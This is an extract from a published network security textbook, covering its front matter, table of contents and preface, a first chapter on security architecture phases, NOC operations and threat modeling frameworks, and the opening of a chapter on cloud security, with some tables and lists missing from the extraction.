Network Security Strategies
Network Security Strategies
Aditya Mukherjee
BIRMINGHAM - MUMBAI
Network Security Strategies
Copyright © 2020 Packt Publishing
All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form
or by any means, without the prior written permission of the publisher, except in the case of brief quotations
embedded in critical articles or reviews.
Every effort has been made in the preparation of this book to ensure the accuracy of the information presented.
However, the information contained in this book is sold without warranty, either express or implied. Neither the
author(s), nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged
to have been caused directly or indirectly by this book.
Packt Publishing has endeavored to provide trademark information about all of the companies and products
mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy
of this information.
ISBN 978-1-78980-629-8
www.packt.com
Packt.com
Subscribe to our online digital library for full access to over 7,000 books and videos, as well
as industry leading tools to help you plan your personal development and advance your
career. For more information, please visit our website.
Why subscribe?
Spend less time learning and more time coding with practical eBooks and Videos
from over 4,000 industry professionals
Improve your learning with Skill Plans built especially for you
Did you know that Packt offers eBook versions of every book published, with PDF and
ePub files available? You can upgrade to the eBook version at www.packt.com and as a print
book customer, you are entitled to a discount on the eBook copy. Get in touch with us at
customercare@packtpub.com for more details.
At www.packt.com, you can also read a collection of free technical articles, sign up for a
range of free newsletters, and receive exclusive discounts and offers on Packt books and
eBooks.
Contributors
I would like to sincerely thank my mother and Shri. KumKum Roy Choudhury for all their
support and encouragement in my life. I would also like to express my gratitude to those
fine individuals and colleagues who have helped me tremendously in the formulation of
this piece of literature by sharing their knowledge and constructive criticism – Sameer
Bengeri, Pradipta Mukherjee, Abhinav Singh, and Deep Shankar Yadav. Dhanyavaadaha.
About the reviewer
Yasser Ali is a cybersecurity consultant at Thales in the Middle East. He has extensive
experience in providing consultancy and advisory services to enterprises regarding the
implementation of cybersecurity best practices, critical infrastructure protection, red
teaming, penetration testing, and vulnerability assessment, managing bug bounty
programs, and web and mobile application security assessment. He is also an advocate
speaker and participant in information security industry discussions, panels, committees,
and conferences, and is a specialized trainer, featuring regularly on different media
platforms around the world.
VAST 35
OCTAVE 35
Summary 36
Questions 37
Further reading 38
Chapter 2: Security for Cloud and Wireless Networks 40
Technical requirements 41
An introduction to secure cloud computing 41
AWS' shared responsibility model 43
Major cybersecurity challenges with the cloud 43
Amazon Web Services (AWS) 45
AWS security features 46
Well-defined identity capabilities 47
Traceability 47
Defense in depth 48
Automation of security best practices 48
Continuous data protection 48
Security event response 49
Microsoft Azure security technologies 50
The Zero Trust model 51
Security layers 51
Identity management using Azure 52
Infrastructure protection using Azure 52
Criticality of infrastructure 53
Encryption 54
Identifying and classifying data 54
Encryption on Azure 55
Network security 55
Internet protection 56
Virtual networks 56
Network integrations 57
CipherCloud 57
Securing cloud computing 60
Security threats 61
Countermeasures 61
Wireless network security 62
Wi-Fi attack surface analysis and exploitation techniques 62
Wi-Fi data collection and analysis 63
Wi-Fi attack and exploitation techniques 64
Best practices 65
Security assessment approach 68
Software-defined radio attacks 70
Types of radio attacks 70
Replay attacks 71
Cryptanalysis attacks 71
Reconnaissance attacks 72
[ ii ]
Table of Contents
Mitigation techniques 72
Summary 73
Questions 74
Further reading 76
Chapter 3: Mitigating the Top Network Threats of 2020 77
Technical requirements 78
The top 10 network attacks and how to fix them 78
Phishing – the familiar foe 79
How to fix phishing threats 82
Rogue applications and fake security alerts – intimidation and imitation 83
How to fix rogue applications and software threats 84
Insider threats – the enemy inside the gates 85
How to fix insider threats 87
Viruses and worms – a prevailing peril 89
How to fix viruses and worms threats 91
Botnets – an adversarial army at disposal 91
How to fix botnet threats 94
Trojan horse – covert entry 94
How to fix trojan threats 96
Rootkit – clandestine malicious applications 96
How to fix rootkit threats 97
Malvertising – ads of chaos 97
How to fix malvertising threats 98
DDoS – defending against one too many 99
How to fix DDoS threats 100
Ransomware – cyber extortions 101
How to fix ransomware threats 103
Notable mentions 105
Drive-by download 105
Exploit kits and AI-ML-driven attacks 105
Third-party and supply chain attacks 106
Creating an integrated threat defense architecture 107
Keeping up with vulnerabilities and threats 107
Understanding various defense mechanisms 108
Safeguarding confidential information from third parties 108
Implementing strong password policies 109
Enhancing email security 109
Vulnerability management policies 110
Vulnerability management life cycle 110
Network vulnerability assessments 111
Utilizing scanning tools in vulnerability assessment 112
Exercising continuous monitoring 113
The NIST Risk Management Framework 114
The NIST Release Special Publication 800-37 116
Summary 117
Questions 118
[ iii ]
Table of Contents
[ iv ]
Table of Contents
[v]
Table of Contents
[ vi ]
Table of Contents
[ vii ]
Table of Contents
[ viii ]
Table of Contents
[ ix ]
Preface
Every small, medium, and large enterprise across the globe today carries out at least a few,
if not all, operations with the help of Information Technology (IT). IT networks form the
basic building blocks of these complex structures with the help of associated technologies
and business logic. Securing such networks is therefore of paramount importance.
In this book, we will learn advanced skills and their real-world implementation, which will
enable us to build a resilient network security apparatus, secure existing network
infrastructure, and implement a high-fidelity, repeatable improvement plan to stay up to
date with the latest cybersecurity threats and how to mitigate them. We will be taking a
deep dive into subjects including network penetration testing, network audits, network
digital forensics, threat intelligence, threat hunting, deception technology, and attack
vectors impacting ICS/SCADA, IoT, and VOIP, among others.
Chapter 2, Security for the Cloud and Wireless Networks, deals with the security concepts that
are relevant for this book with respect to cloud and wireless networking. The majority of
today's attacks on the corporate side are targeted toward cloud instances. On the other
hand, unprotected wireless networks are textbook entry points for threat actors looking to
gain access to an organization's infrastructure. We will cover this in detail and discuss how
each category of the network can be protected and the various methods that can be
employed to defend them.
Chapter 3, Mitigating the Top Network Threats of 2020, discusses the top network threats and
how to mitigate them. This will also give you a detailed understanding of how to perform a
network security assessment, such as a vulnerability assessment, and perform continuous
monitoring, enabling you to monitor active and ongoing threats in your environment.
Chapter 4, Network Penetration Testing and Best Practices, is a step-by-step guide for you,
after which you yourself can perform network penetration testing and document the
findings for the next steps. We will look at the different tools/platforms that will help you
perform these activities efficiently.
[2]
Preface
Chapter 7, Performing Network Auditing, explains why network auditing is needed and how
to conduct it. This will be a step-by-step guide for you, after which you yourself
can perform network audits and document the findings for the next steps. We will look at
the different tools, platforms, and other guides that will help you perform these activities
efficiently.
Chapter 8, Continuous and Effective Threat Management, discusses what threat management
is all about and how it is going to help you transform your security posture. Most
organizations face some magnitude of security threats today and effective management of
these threats and prioritization is crucial for success. In this chapter, this is exactly what you
will learn and understand as a practice for your operations. We will also talk about how to
have a risk discussion with senior management and translate risk in business terms. The
essence is how to analyze a threat and gauge its business impact so as to communicate it to
the leadership in appropriate terms. A threat may mean different things to different areas
of the organization. Hence, putting the implications into perspective and validating the risk
and control effectiveness is critical for a security professional.
Chapter 9, Proactive Security Strategies, is a step-by-step guide to how to make your security
approach proactive in nature. We look at steps to develop a proactive security strategy, by
means of which companies can effectively assess risk and minimize the potential of a
breach.
[3]
Preface
In order to utilize the tools and platforms discussed in the book, make sure you have a
computer/laptop with a modern processor that has between 8 and 16 GB of RAM.
Software/hardware covered in the book OS requirements
A computer/laptop with a modern processor that has between 8 and 16
Windows/macOS
GB of RAM
Conventions used
There are a number of text conventions used throughout this book.
CodeInText: Indicates code words in text, database table names, folder names, filenames,
file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an
example: "Mount the downloaded WebStorm-10*.dmg disk image file as another disk in
your system."
When we wish to draw your attention to a particular part of a code block, the relevant lines
or items are set in bold:
[default]
exten => s,1,Dial(Zap/1|30)
exten => s,2,Voicemail(u100)
exten => s,102,Voicemail(b100)
exten => i,1,Voicemail(s0)
[4]
Preface
Bold: Indicates a new term, an important word, or words that you see on screen. For
example, words in menus or dialog boxes appear in the text like this. Here is an example:
"As soon as you click on the Submit button, the script gets stored on the server."
Get in touch
Feedback from our readers is always welcome.
General feedback: If you have questions about any aspect of this book, mention the book
title in the subject of your message and email us at customercare@packtpub.com.
Errata: Although we have taken every care to ensure the accuracy of our content, mistakes
do happen. If you have found a mistake in this book, we would be grateful if you would
report this to us. Please visit www.packtpub.com/support/errata, selecting your book,
clicking on the Errata Submission Form link, and entering the details.
Piracy: If you come across any illegal copies of our works in any form on the internet, we
would be grateful if you would provide us with the location address or website name.
Please contact us at copyright@packt.com with a link to the material.
If you are interested in becoming an author: If there is a topic that you have expertise in,
and you are interested in either writing or contributing to a book, please visit
authors.packtpub.com.
[5]
Preface
Reviews
Please leave a review. Once you have read and used this book, why not leave a review on
the site that you purchased it from? Potential readers can then see and use your unbiased
opinion to make purchase decisions, we at Packt can understand what you think about our
products, and our authors can see your feedback on their book. Thank you!
[6]
1
Section 1: Network Security
Concepts, Threats, and
Vulnerabilities
In this section, you will find information pertaining to the fundamentals of networking
security, from the perspective of both cloud networks and wireless networks, as well as the
top threats that impact networks worldwide. This includes mechanisms and solutions that
can be implemented by you as a network security analyst. We will also take a look at the
various types of setup that organizations have and what are the best practices, according to
leading industry resources, for secure network establishment.
In this prelusive chapter, we will be looking at the core concepts that will form our building
blocks for a comprehensively secure network architecture, besides a few best practices and
guidelines.
Technical requirements
There are no requirements for this chapter.
Network Security Concepts Chapter 1
Network security in itself touches upon various attributes of security controls that a
security professional should take into account, such as security gateways, SSL inspection,
threat prevention engines, policy enforcement, cloud security solutions, threat detection
and insights, attack analysis w.r.t frameworks, and so on.
[9]
Network Security Concepts Chapter 1
Before proceeding further, please ensure that you are familiar with the
following concepts:
Next, we will take a look at the various attributes of network security and how to conduct
continuous improvements and post-deployment analysis.
[ 10 ]
Network Security Concepts Chapter 1
As a best practice, break down all the security controls in the organization into major blocks
and test each one. This allows you to validate their effectiveness and understand the
improvement areas or security gaps. The overall blocks can be Identify, Detect, Protect,
Respond, Recover, and Comply:
The preceding table shows the key components of a network security program and the
solutions that should be (ideally) present in those components to give it holistic coverage
against threats. Some of the key topics that organizations should focus on, to begin with,
will be discussed in the following subsections.
[ 11 ]
Network Security Concepts Chapter 1
Concerning passwords and credentials, a policy must be developed that enforces the usage
of complex passwords with more than an eight-character limit with the mandated usage of
numeric values, capital letters, and special characters. A password change policy must also
be in place.
Network segmentation
Network segmentation refers to segregating a network into sub-networks with the aim of
improving performance and security (a reduced attack surface and grouping systems with
similar security needs). This can be achieved by implementing firewalls, a virtual local area
network (LAN), and software-defined networking (SDN), to name a few.
Proper network segmentation will allow the organization to segregate low-priority and
low-trust network areas from the rest of the infrastructure or critical network segments,
thus preventing widespread impact in the event of a cyber attack. This also helps with
utilizing security monitoring platforms and access controls for the most business-critical
segments of the organization.
Network choke-points
One of the major differentiating aspects between a fragile and resilient cybersecurity
program is the strategy and approach toward building a comprehensive foundation. This
foundation can be built only by having a clear visualization of the logical and technological
layout of the environment. For example, identifying and adequately monitoring bottlenecks
and choke-points can often help us discover larger and deeper problems in the network's
foundation.
In military terms, a choke-point is a location on land or sea (a valley or a strait) where the
military is forced to pass through a narrow column, which makes it easier for an opposing
force to take them out with ease. Technically, this is a shooting a fish in a barrel kind of
situation. In networking terms, a similar situation is faced when the data flow of a network
is restricted due to bandwidth or application constraints.
[ 12 ]
Network Security Concepts Chapter 1
Defense-in-Depth
This is an implementation approach where multiple layers of security or defensive controls
throughout the environment or landscape have redundancy in case of a security incident.
This is also known as the castle approach. The reason why this approach is important is
that it takes the weight off a single security/defensive control and
supplements/compliments the security strategy by having multiple independent controls in
place at different layers.
Originally, this was a military strategy, also known as deep in defense, that sought to
hinder the movement of enemy forces. The focus is not on stopping them entirely via a
frontal assault but by buying time and slowing down the attack's progression.
This is an effective measure as it often results in the attacker losing momentum over a
period of time due to no-or-less progress. This vital time can be used to mount an attack on
the assault forces or reenforce the defenses of the defending team.
[ 13 ]
Network Security Concepts Chapter 1
Soft targets
There is an English phrase that states a chain is no stronger than its weakest link, which means
that a group is only as strong as its weakest link. In networking terms, this holds to the
core, as discussed and explored in the preceding section. You, as a network security expert,
need to identify and account for a single point of failure and implement a highly
dependable process that will be put in place to mitigate such instances. We should also
ensure that the appropriate controls are implemented around such susceptible resources of
the network, as per their risk profile.
Being a critical operational function, NOC also needs to aim for continuous improvement
concerning processes, approaches, and turnaround time to showcase business outcomes
and value creation.
Post-deployment review
The major focus here is to verify whether all the deployments are accurate and operate as
expected. The idea is to evaluate the actual versus expected levels of service delivery and
performance.
Now that we are familiar with the various network security concepts and their key
components, next, we will take a look at the systematic approach that organizations should
follow for a comprehensive network security architecture.
[ 14 ]
Network Security Concepts Chapter 1
Let's quickly run through what these stages are about before analyzing them in detail in the
upcoming subsections:
Planning and analysis: The planning and analysis stage is responsible for
developing a conceptual network security architecture design.
Designing: This stage is responsible for developing a detailed network security
architecture design.
Building: In the building phase, we focus on developing the network
components that were identified in the first phase of planning and analysis, as
well as the second phase, where we created the outline design of how we
envision the network to be formed.
Testing: The testing phase focuses on validating the implementations that were
done in the previous phase. This also accounts for how effective and efficient
they are regarding their intended operational capability.
Deployment: The major focus of the deployment phase is to ensure that the
deployment and go-live plans are in place and that the operation teams are
equipped to take over the operations for the network.
In the upcoming subsections, we'll understand what activities are carried out in these
stages and how they achieve their goal.
Before proceeding further, please ensure that you are familiar with the
following concepts:
[ 15 ]
Network Security Concepts Chapter 1
Defining the security domains and the security zones, their security boundaries,
and inter-zone data flows
Defining the communication security requirements for intra-zone and inter-zone
data flows
Defining network integration with AAA, management and monitoring systems,
and operators
Defining network access controls (physical and logical) for each security domain
Evaluating and selecting a network security service and component vendors
Inputs Outputs
• Network security/compliance baseline and gap analysis
• Existing network architecture designs • Network security requirements
• Requirements (regulatory, security policy, contract) • Conceptual network security architecture
• Stakeholder input • Conceptual cost estimates
• Network security solution plan
[ 16 ]
Network Security Concepts Chapter 1
The planning and analysis phase sets the stage for having a foundational understanding of
the network requirements and constructs the basis for the next phase, which is designing
the network architecture and its associated components.
Designing
The designing stage is responsible for developing a detailed network security architecture
that covers the following aspects:
[ 17 ]
Network Security Concepts Chapter 1
Inputs Outputs
• Network security/compliance baseline and gap analysis
• Requirement gathering • Network security requirements
• Network security requirements • Conceptual network security architecture
• Conceptual network security architecture • Conceptual cost estimates
• Network security solution plan
Once the designing phase has been completed and an outline of the network architecture is
formed, we can move on to the next phase, which is the building phase.
Building
In the building phase, we focus on developing the network components that were identified
in the first phase of planning and analysis, as well as the second phase, where we created
an outline design of how we envision the network to be formed. This covers the following
broad aspects:
[ 18 ]
Network Security Concepts Chapter 1
Inputs Outputs
• Installation and configuration guides
• Equipment configuration templates
• Configuration baseline
• Network security requirements
• Network security operational procedures
• Network security detailed design
• Asset inventory (CMDB) and cable and cryptographic key registers
• Network security test plan
• Deployment execution plan (including a go-live support plan)
Once the building phase has been completed and the major components of the network
architecture have been put in place, we can move on to the next phase, which is the testing
phase.
Testing
The testing phase focuses on validating the implementations that have been done in the
previous phase. It also accounts for how effective and efficient they are in their intended
operational capability. This includes the following:
Auditing equipment labels and their location against the asset register
Auditing cable labels against the cable register
Auditing network configuration and labels
Auditing cryptographic keys against the key register
Performing a network scan for discovery and mapping
Performing vulnerability analysis and penetration testing scans
Auditing logging functionality
Performing integration and acceptance tests
[ 19 ]
Network Security Concepts Chapter 1
Auditing all networked equipment and cabling labels against asset and cable
registers
Auditing equipment configuration against a documented baseline
Auditing default/system account passwords and cryptographic keys/certificates
Performing discovery network scans and firewall scans
Performing vulnerability scans for management purposes, as well as the control
planes and systems (in-band and out-of-band)
Verifying that password audits and network scans have been captured by the
appropriate audit logs
Testing integration with the management, AAA, and monitoring systems
Performing performance and scalability testing
Performing user acceptance testing against requirements
Inputs Outputs
• Network security requirements • Asset, cable, and cryptographic key audit results
• Network security detailed design • Configuration audit results
• Asset, cable, and cryptographic key registers • Network scan results
• Configuration baseline • Testing results signoff
After completing the testing phase, where we document our findings from the various tests
and audits we've performed, we can move on to the next phase, which is the
deployment phase.
[ 20 ]
Network Security Concepts Chapter 1
Deployment
The major focus of the deployment phase is to ensure that the deployment and go-live plans
are in place and that the operation teams are equipped to take over the operations for the
network. This includes the following:
Inputs Outputs
• Deployment execution plan (including a go-live • Deployed new network security capability
support plan) • Operational acceptance
• Authorization to deploy • Updated network security/compliance baseline and gap
• Network security implementation plan analysis
• Network security solution plan • Management signoff
[ 21 ]
Network Security Concepts Chapter 1
Once the deployment phase has been completed, along with the required signoffs from the
operation teams and the executive leadership, we can move on to the last phase, which is
the post-deployment phase.
Post-deployment
The post-deployment phase focuses on the activities that will be used to monitor the
performance of the network, as anticipated, and inculcate strategies and methods to uplift
the network's performance. This includes the following:
Reporting: Establish regular KPI and KRI reporting (for example, for
compliance)
Continuous improvement: Perform regular vulnerability assessments
Regular audits: Perform regular audits against known configuration and
registers
This concludes our discussion on the network security architecture approach. This gave
you a detailed deep dive into the mindset and procedures that you should take into account
when planning for a network security exercise for an organization. However, most
organizations might already have a network in place.
The approach we use might take a slight diversion in this case, such as starting with
a security audit, which investigates their network security policies and verifies the network
assets for potential deficiencies. This will give you a clear picture of what needs to be
addressed and the prioritization. Findings may result in restrict user access privileges and
implementing the least privileges across the environment in an iterative process. You may
also need to review your security controls and platforms in use for detection, prevention,
response, and so on based on their effectiveness and how they are used (the way they are
used and the team's ability to use them appropriately).
Now that we've completed the basic groundwork, we will look at the various best practices
of network security and how they help us build a more resilient environment.
[ 22 ]
Network Security Concepts Chapter 1
Typically, a Security Operations Center (SOC) is something that is at the center of security
monitoring and operations, but at the same time, a Network Operations Center (NOC) can
play a very important role in network resilience and optimal performance. In this section,
we'll take a look at some of the key attributes of the NOC.
NOCs often encounter complex networking issues that might need troubleshooting and
collaboration between different IT teams to investigate and resolve the issue. To increase
the overall effectiveness of an NOC, organizations focus on a few areas, as discussed in the
following subsections.
[ 23 ]
Network Security Concepts Chapter 1
An incident response team should consist of a hierarchical team structure, where each level
is accountable and responsible for certain activities, as shown here:
[ 24 ]
Network Security Concepts Chapter 1
Tier 1 Analyst: Acts as the first point of contact in the incident response process.
They areresponsible for recording, classification, and first-line investigation.
Tier 2 Analyst: Acts as an escalation point for Tier 1. Also acts as an SME for
deeper investigation and the creation of knowledge articles. They are also
required to escalate major incidents to Tier 3.
Tier 3 Analyst: Acts as an escalation point for Tier 2 and is responsible for
restoring an impacted service. They escalate unresolved incidents to the relevant
vendor or team for resolution. They also act as a liaison between internal and
vendor teams.
Incident Coordinator: Acts as the administrative authority ensuring that the
process is being followed and that quality is maintained. They are responsible for
assigning an incident within a group, maintaining communication with the
incident manager, and providing trend analysis for iterative incidents.
Incident Manager: Manages the entire process until normal service is restored.
They are primarily responsible for planning and coordinating activities such as
monitoring, resolution, and reporting. They act as a point for major escalations,
monitor the workload and SLA adherence, conduct incident reviews, provide
guidance to the team, and ensure continuous improvement and process
excellence.
In some organizations, there are other roles such as incident assignment group manager and
incident process owner (who is accountable for designing, maintaining, and improving the
process) who ensure the efficiency and effectiveness of the service's delivery.
[ 25 ]
Network Security Concepts Chapter 1
The preceding screenshot is from ServiceNow, which is a leading ITSM platform, often
used by SOC/NOC as a ticketing system.
Monitoring policy
The NOC establishes and implements standard monitoring policies and procedures for
performance benchmarking and capacity monitoring for organization infrastructure. To
rule out false positives at the beginning of an implementation, it is imperative to set a
baseline of normal activities, traffic patterns, network spikes, and other behaviors by
studying the network for an initial period. It is also important to have visibility into the
network at all levels and be able to detect the root cause in a short amount of time.
[ 26 ]
Network Security Concepts Chapter 1
These reporting dashboards allow us to be aware of the current situation of the SOC/NOC
and help in identifying and responding to any issues that might arise.
Escalation
A streamlined, time-sensitive escalation process with an accurate reflection of artifacts is
one of the most important factors for smoothly running operations and timely responses.
Analysts are told to escalate issues if they do not have the relevant reaction plan or
playbook in place for the said incident, so as to get insights from the next level for the
appropriate resolution.
[ 27 ]
Network Security Concepts Chapter 1
Apart from the ones discussed in the preceding subsections, there are several
other important procedures that play a role in the overall service delivery process and
incident management best practices, such as change management, problem management,
and capacity and vendor management. These can be studied in detail in ITIL as part of
larger ITSM practices.
Most NOCs today are innovating for better performance by including analytics for deriving
insights and correlation, from AI for predicting issues and recommending best fixes, to
automation and orchestration for reducing the time to respond and human errors. Today, a
lot of Managed Service Providers (MSPs) are coming into the picture of managing an
NOC. The reason for this is that a lot of organizations are leaning toward outsourcing their
NOC operations due to perceived benefits such as improved efficiency, better reliability,
less downtime, enhanced security and compliance, improved ROI, cost savings, and risk
transfer. The other major benefit of outsourcing is the skilled resource and industry
expertise that comes with an MSP.
Now that we know how an NOC operates and the different segments that make it
operational for effective network security monitoring, let's discuss how to assess the
network security's effectiveness and the efficiency of an organization.
[ 28 ]
Network Security Concepts Chapter 1
Static analysis: This focuses on auditing application code, network and server
configuration, and providing an architecture review of the network. This is
exhaustive and is work and time-intensive but derives a lot of valuable insight
into the inner workings of the various components and the configuration errors
and vulnerabilities that may persist in the environment as they are conducted at
runtime. Therefore, we need to break this into small, actionable steps such as
design review, configuration review, and static code analysis.
Dynamic analysis: This focuses on the threat actor's perspective, who aims to
exploit services and threat vectors that can result in the loss of Confidentiality,
Integrity, and Availability (CIA). This can be inclusive of network infrastructure
testing, web application and services testing, and dynamic code analysis.
[ 29 ]
Network Security Concepts Chapter 1
So far, we have explored the various major aspects that should form the basic building
blocks of a good network security architecture. Next, we will take a look at some techno-
management aspects.
The overall consensus reflects the following path once all the activities have been mapped:
Quick Wins: These are activities that take less time/effort yet have a high impact.
Major Projects: These are activities that require more time and effort and have a
high impact.
Fill-Ins: These are activities that take less time but have less impact.
Thankless Tasks: These are activities that take a huge amount of time/effort yet
don't have a sizable impact.
[ 30 ]
Network Security Concepts Chapter 1
This approach provides a strategic outline to the team and helps them decide how and
what to prioritize with respect to the timelines. Generally, it's recommended to aim for
Quick Wins first as they provide the momentum for achieving goals in a short span of time.
Then, you should focus on the major projects.
Threat modeling
This is a structured approach toward (network) security that assesses the potential threat
landscape concerning the point of view of an attacker. This takes into consideration the
attacker's motives, threat profile (their capability and skill), key assets of interest, and the
most likely attack vector to be used, among other attributes, to understand which threats
are most likely to materialize and how they will unfold in the environment. The idea
behind this is to understand the environment better by reviewing all the components and
processes.
Today, most threat modeling methodologies focus on one of the following approaches:
asset-centric, attacker-centric, and software-centric. The following diagram shows what risk
inherently means. Risk is when we have an asset that is vulnerable to a certain flaw or
loophole, and we have a threat vector that can exploit the vulnerability. Ultimately, this
impacts the asset and Confidentiality, Integrity, and Availability (CIA).
A+T+V=R
[ 31 ]
Network Security Concepts Chapter 1
1. First, the scope of the analysis is defined and each component of the application
and its infrastructure is documented.
2. This is followed by developing a data flow diagram that shows how each of these
components interacts. This helps us assess the control mechanism. Privileges are
verified for data movement.
3. Then, potential threats are mapped to these components and their risk impact is
quantified.
4. Finally, various security mitigation steps are evaluated that might already be in
place to mitigate such threats. Here, we document the requirements for
additional security controls (if applicable).
On the flip side, an attacker might conduct an exercise similar to the following threat
modeling:
1. They would start by evaluating all possible entry points into the
network/application/infrastructure.
2. The next step would be to focus on the dataset or assets that would be accessible
to them via these access points and then evaluate the value or possibility of using
these as a pivot point.
3. Post this, the attacker crafts the exploit and executes it.
Now that we have a basic understanding of the threats that we may face, it is important to
have standardized frameworks that can be referred to by professionals to assess the nature
of these threats and the impact they may have.
[ 32 ]
Network Security Concepts Chapter 1
STRIDE
STRIDE is a security framework that classifies security threats into six categories, as
follows:
This was developed by Microsoft to verify security concepts such as authenticity, integrity,
known reputability, confidentiality, availability, and authorization.
PASTA
Process for Attack Simulation and Threat Analysis (PASTA) is a risk-centric approach
focused on identifying potential threat patterns. This is an integrated application threat
analysis that focuses on an attacker-centric view that security analysts can leverage to
develop an asset-centric defense strategy.
It has seven stages that build up to the impact of a threat. These stages are as follows:
[ 33 ]
Network Security Concepts Chapter 1
Threat Analysis
Weakness and Vulnerability Analysis
Attack Modeling and Simulation
Risk Analysis and Management
Next, we will take a look at the Trike framework and see how it's used for security auditing
for risk management.
Trike
Trike is a framework for security auditing from a risk management outlook perspective.
The process starts with defining the requirement model that the threat models are based on.
The requirement model outlines the acceptable level of risk, which is associated with each
asset class (the actor-asset-action matrix):
This matrix is further broken down into actions such as creating, reading, updating, and
deleting, along with associated privileges such as allowed, restricted, and conditional. By
following this, possible threats are specified/mapped alongside a risk value, which is based
on a five-point scale for each action based on its probability.
[ 34 ]
Network Security Concepts Chapter 1
VAST
Visual, agile, and simple threat modeling (VAST) is an agile software development
methodology with a focus on scaling the process across infrastructure and SDLC. VAST
aims to provide actionable outputs for various stakeholders and its scalability and usability
is a key factor for its adaptability in larger organizations. The following diagram illustrates
a VAST model:
VAST utilizes two threat models – the application threat model and the operational threat
model. The application threat model uses process flow diagrams to represent the
architectural viewpoint, whereas the operational threat model uses data flow diagrams to
represent the attacker's viewpoint.
OCTAVE
Operationally critical threat, asset, and vulnerability evaluation (OCTAVE) is a security
framework that's utilized for assessing risk levels and planning countermeasures against
them. The focus is to reduce risk exposure to potential threats and determine the likelihood
of an attack and its impact. It has three broad stages, as follows:
[ 35 ]
Network Security Concepts Chapter 1
It has two known formats – OCTAVE-S, which is a simplified format suitable for smaller
organizations, and OCTAVE Allegro, which is a more comprehensive format suitable for
large organizations.
Summary
In this chapter, we have taken a look at the foundational network security concepts and
components that form the strong base that's required for a secure network implementation.
Post this, we took a step-by-step dive into the various phases of building network security,
which are planning and analysis, designing, building, testing, and deployment. In the
second half of this chapter, we looked at an optimal NOC setup and its various attributes,
such as incident management, monitoring, escalation, and reporting. Lastly, we dug into
network security assessments and discussed threat modeling.
By completing this chapter, you now understand that network security is a vast domain
that requires a bottom-up approach if we wish to fully understand the minute mechanisms
that make it tick. As a security professional, you must have good exposure to the
fundamentals of the network and the models and frameworks explained in this chapter
while, at the same time, be able to identify and remediate deep-seated technical issues. I
highly recommend doing a foundational assessment of the network configuration and
reviewing policies and procedures in place in order to incorporate security from the inside
out.
In the next chapter, we will take a look at the security concepts of cloud environments and
wireless networks. We will look at the major security concerns and the industry best
practices that can be considered while building or assessing a cloud environment or
wireless networks for an organization.
[ 36 ]
Network Security Concepts Chapter 1
Questions
As we conclude this chapter, here is a list of questions for you to test your knowledge
regarding this chapter's content. You will find the answers in the Assessments section of the
Appendix:
[ 37 ]
Network Security Concepts Chapter 1
6. The go-live support plan originates from which phase of the network security
architecture?
Deploy
Test
Analyze
Build
7. What component of a web application would not be part of a threat model?
Mobile user interface
An application's database
Whether the website is vulnerable to hacking
A physical threat to a company's data center
Further reading
Network Security Overview: https://www.packtpub.com/networking-and-
servers/network-security-video
Some great books on network security:
Applied Network Security: https://prod.packtpub.com/in/
networking-and-servers/applied-network-security
Network Security with pfSense: https://prod.packtpub.com/in/
networking-and-servers/network-security-pfsense
ISO Model: https://www.geeksforgeeks.org/layers-osi-model/
Awake Security: Advanced Network Traffic Analysis Solution: https://
awakesecurity.com/product/
SolarWinds Network Performance Monitor: https://www.solarwinds.com/
network-performance-monitor
ManageEngine OpManager: https://www.manageengine.com/network-
monitoring/
Paessler PRTG Network Monitor: https://www.manageengine.com/network-
monitoring/
ServiceNow - NOC: IT Operations Management: https://www.servicenow.
com/products/it-service-management.html
[ 38 ]
Network Security Concepts Chapter 1
[ 39 ]
2
Security for Cloud and Wireless
Networks
With the advent of technology, there has always been a drive to reduce cost and
maintenance efforts, and increase efficiency, reliability, performance, and security. This
gave way to the evolution of the technological framework and the inception of technologies
such as cloud computing and wireless connectivity. Today, a majority of attacks on the
corporate side are targeted toward cloud instances. On the other hand, unprotected
wireless networks are textbook entry points for threat actors looking to gain access to the
organization's infrastructure.
In this chapter, we will analyze how each segment of a cloud and wireless network can be
protected and the various strategies that can be implemented to defend them. In order to do
this, we will use examples of cloud providers such as AWS and CipherCloud.
Technical requirements
To get the most out of this chapter, you should be familiar with the following tools and
platforms:
You are also encouraged to explore the services offered by leading cloud security providers
to gain an understanding of the overall offerings in the market, including Bitglass, Skyhigh
Networks, Netskope, CipherCloud, and Okta.
Resource scalability
Reduced operational cost
Reduced infrastructure maintenance cost and effort
Storage efficiency and accessibility
Efficient BCP/DR
Control retention options such as Infrastructure as a Service (IaaS), Platform as
a Service (PaaS), and Software as a Service (SaaS)
Security features such as encryption, VPNs, and API keys
Regulatory and compliance requirements
[ 41 ]
Security for Cloud and Wireless Networks Chapter 2
While we embark on the journey toward cloud security, do keep in mind the following
considerations:
Besides keeping the preceding points in mind, there are a few steps you need to take in
creating a secure architecture:
Firstly, understand the organization's business goals and objectives as that will
be the primary driver of cloud adoption, and consequently, its security.
Secondly, understand the IT strategy and align your plan to it.
Third, make a clear distinction of how the cloud structure will be constructed.
What are the trust areas and relationships? Do you see a zero-trust model as
feasible? Is the business ready for it?
Lastly, what are the regulatory and compliance requirements, are there any other
internal and external factors that may influence your plan? Take account of them
and plan accordingly.
While trying to understand how to secure your cloud deployment, besides adopting the
preceding steps it is also important to make a clear distinction between your responsibility
as an organization, and the responsibility of the cloud service provider. AWS has come out
with a shared responsibility model that demonstrates this. Let's take a closer look
[ 42 ]
Security for Cloud and Wireless Networks Chapter 2
Before we dive into details of the different vendors that provide us with cloud solutions,
let's quickly take a look at some of the security concepts and attributes associated with
AWS cloud services and how we can implement and fine-tune these for a better security
posture.
[ 43 ]
Security for Cloud and Wireless Networks Chapter 2
However, the picture is not all rosy and there are various challenges from a security
perspective that haunt cloud solutions. Let's see a snapshot view of some of these issues:
[ 44 ]
Security for Cloud and Wireless Networks Chapter 2
Besides the aforementioned challenges, there are a few other concerns that also surround
the intent to cloud transformation. Some of the major concerns that can be highlighted are
as follows:
Other top threats to the cloud include data breaches; insufficient identity, credential, and
access management; insecure interfaces and APIs; system vulnerabilities; account or service
hijacking by using stolen passwords; malicious insiders; data loss; abuse and nefarious use
of cloud services – and many more. Wire19 wrote an article on these threats, along with
remediation steps for them, which can be found at https://wire19.com/10-biggest-
threats-to-cloud-computing-2019-report/.
Now that we have talked about the preludes to a good cloud service engagement, let's take
a look at one of the most widely used cloud service providers and understand what they
offer.
- Russian proverb
Amazon Web Services (AWS) is one of the largest cloud service providers in the world,
